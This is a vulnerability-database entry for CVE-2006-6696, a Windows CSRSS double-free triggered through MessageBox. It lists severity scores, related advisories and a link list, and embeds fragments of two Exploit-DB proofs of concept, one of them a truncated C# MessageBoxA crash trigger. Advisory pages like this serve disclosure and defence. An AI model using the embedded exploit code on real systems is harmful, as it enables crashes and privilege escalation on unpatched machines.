CVE-2006-6696
published 2006-12-22CVE-2006-6696: Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a…
PriorityP430medium6.9CVSS 2.0
AVLACMAuNCCICAC
EXPLOIT
EPSS
3.28%
86.9th percentile
Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a MB_SERVICE_NOTIFICATION message with crafted data, which sends a HardError message to Client/Server Runtime Server Subsystem (CSRSS) process, which is not properly handled when invoking the UserHardError and GetHardErrorText functions in WINSRV.DLL.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fmp2-4wcx-jwx4: Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with
ghsa_unreviewed·2022-05-01
CVE-2006-6696 [MEDIUM] CWE-119 GHSA-fmp2-4wcx-jwx4: Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with
Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a MB_SERVICE_NOTIFICATION message with crafted data, which sends a HardError message to Client/Server Runtime Server Subsystem (CSRSS) process, which is not properly handled when invoking the UserHardError and GetHardErrorText functions in WINSRV.DLL.
GHSA
GHSA-jgq8-8q6h-fqgv: The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory fro
ghsa_unreviewed·2022-05-01·CVSS 6.9
CVE-2006-6797 [MEDIUM] GHSA-jgq8-8q6h-fqgv: The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory fro
The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory from csrss.exe via crafted arguments to the NtRaiseHardError function with status 0x50000018, a different vulnerability than CVE-2006-6696.
No detection rules found.
Exploit-DB
Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure
exploitdb·2006-12-27
CVE-2006-6696 Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure
Microsoft Windows - NtRaiseHardError 'Csrss.exe' Memory Disclosure
---
/////////////////////////////////////////
/////////////////////////////////////////
///// Microsoft Windows NtRaiseHardError
///// Csrss.exe memory disclosure
/////////////////////////////////////////
///// Ruben Santamarta
///// ruben at reversemode dot com
///// www.reversemode.com
/////////////////////////////////////////
///// 12.27.2006
///// For educational purposes ONLY
///// Compiled using gcc (Dev-C++)
////////////////////////////////////////
#include
#include
#include
#include
#define UNICODE
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_SUCCESS ((NTSTATUS) 0x00000000)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004)
#define STATUS_INVALID_PARAMETER ((NTSTATUS) 0xC000000D)
Exploit-DB
Microsoft Windows - 'MessageBox' Memory Corruption Local Denial of Service
exploitdb·2006-12-20
CVE-2006-6696 Microsoft Windows - 'MessageBox' Memory Corruption Local Denial of Service
Microsoft Windows - 'MessageBox' Memory Corruption Local Denial of Service
---
// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
{
[DllImport("user32.dll")]
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);
static unsafe void Main()
{
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
{
for(int i=0; i> csc /unsafe mbox.cs
// >> mbox.exe
// milw0rm.com [2006-12-20]
No writeups or analysis indexed.
http://blogs.technet.com/msrc/archive/2006/12/22/new-report-of-a-windows-vulnerability.aspxhttp://groups.google.ca/group/microsoft.public.win32.programmer.kernel/browse_thread/thread/c5946bf40f227058/7bd7b5d66a4e5affhttp://isc.sans.org/diary.php?n&storyid=1965http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051394.htmlhttp://research.eeye.com/html/alerts/zeroday/20061215.htmlhttp://secunia.com/advisories/23448http://securitytracker.com/id?1017433http://www.determina.com/security.research/vulnerabilities/csrss-harderror.htmlhttp://www.kuban.ru/forum_new/forum2/files/19124.htmlhttp://www.security.nnov.ru/Gnews944.htmlhttp://www.security.nnov.ru/files/messagebox.chttp://www.securityfocus.com/archive/1/455061/100/0/threadedhttp://www.securityfocus.com/archive/1/455088/100/0/threadedhttp://www.securityfocus.com/archive/1/455104/100/0/threadedhttp://www.securityfocus.com/archive/1/455158/100/0/threadedhttp://www.securityfocus.com/archive/1/455546/100/0/threadedhttp://www.securityfocus.com/archive/1/466331/100/200/threadedhttp://www.securityfocus.com/bid/21688http://www.securityfocus.com/bid/23324http://www.vupen.com/english/advisories/2006/5120http://www.vupen.com/english/advisories/2007/1325https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-021https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1816http://blogs.technet.com/msrc/archive/2006/12/22/new-report-of-a-windows-vulnerability.aspxhttp://groups.google.ca/group/microsoft.public.win32.programmer.kernel/browse_thread/thread/c5946bf40f227058/7bd7b5d66a4e5affhttp://isc.sans.org/diary.php?n&storyid=1965http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051394.htmlhttp://research.eeye.com/html/alerts/zeroday/20061215.htmlhttp://secunia.com/advisories/23448http://securitytracker.com/id?1017433http://www.determina.com/security.research/vulnerabilities/csrss-harderror.htmlhttp://www.kuban.ru/forum_new/forum2/files/19124.htmlhttp://www.security.nnov.ru/Gnews944.htmlhttp://www.security.nnov.ru/files/messagebox.chttp://www.securityfocus.com/archive/1/455061/100/0/threadedhttp://www.securityfocus.com/archive/1/455088/100/0/threadedhttp://www.securityfocus.com/archive/1/455104/100/0/threadedhttp://www.securityfocus.com/archive/1/455158/100/0/threadedhttp://www.securityfocus.com/archive/1/455546/100/0/threadedhttp://www.securityfocus.com/archive/1/466331/100/200/threadedhttp://www.securityfocus.com/bid/21688http://www.securityfocus.com/bid/23324http://www.vupen.com/english/advisories/2006/5120http://www.vupen.com/english/advisories/2007/1325https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-021https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1816
2006-12-22
Published